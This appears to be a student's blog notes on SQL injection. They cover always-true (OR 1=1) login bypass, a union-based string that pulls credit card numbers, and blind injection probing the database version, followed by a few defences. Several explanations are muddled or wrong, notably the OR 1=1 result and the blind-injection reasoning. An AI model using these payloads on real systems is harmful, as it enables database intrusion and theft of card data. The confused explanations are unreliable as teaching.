Computer Security- SQL Injections
SQL Injections
Database commands are written in SQL. Using SQL commands, results will be fed to the requester.
Query- result process
Basic SQL commands
Data commands
SELECT- retrieve records
UPDATE- Amend existing records in db
DELETE- Delete records from DB
INSERT- Insert new records into DB table
DB Structure Commands
CREATE TABLE- Add new table to DV
DROP TABLE- delete table
ADD COLUMN- Add new column to db table
So, using SELECT title FROM books Where author =Dave
Would select titles from the table books with the author as Dave
SQL Injections
Should be sending XYZ, but instead send XYZ +1
Causes for unexpected results from DB, which will give these to requester
SQL Attacks based on “always true” cases
User says to SELECT FROM Books WHERE ISBN = “105” OR 1=1
This makes query true as 1=1
As a result all ISBNS with 105 will be returned
Select attacks
SELECT * FROM users WHERE
Username= “Administrator”
And password = “Password”
But instead of inputting your password, input OR 1=1
Thus takes password to be true
Union-based attacks
Require more information about the DB
Appending a UNION command to existing SELECT query
Consider:
SELECT * FROM Statements WHERE Date > ‘2013-07-01’
But instead supplying the data value as such:
2013-07-01’ UNION SELECT * FROM cc WHERE CardNumber !=‘
So what it is doing, is querying statements with a date after the one input. AS well as this, all credit card number entries from table CC are queried
Relies on table being called CC with a CardNumber column
Blind SQL Injections
Works by yes/no questions
Advanced example:
Guessing version of an SWL DB
Query for the ISBB (0736252588’_ AND Substring(@@version,
1,1)<‘N’—
If it fails, then character is before N
Using G would tell us if it is then before or after G
In this case, after G
Meaning it is between G and M
Lets say it fails, an query is re-ran between G and M
M is treid
Query succeeds
Indicates a MS DB
If this fails, then it is known that the character is between G and M
Defences
Logs- can be checked to see whats happening
Social context- has there been a few odd calls
Prevention
Give least privelages
Comments
Post a Comment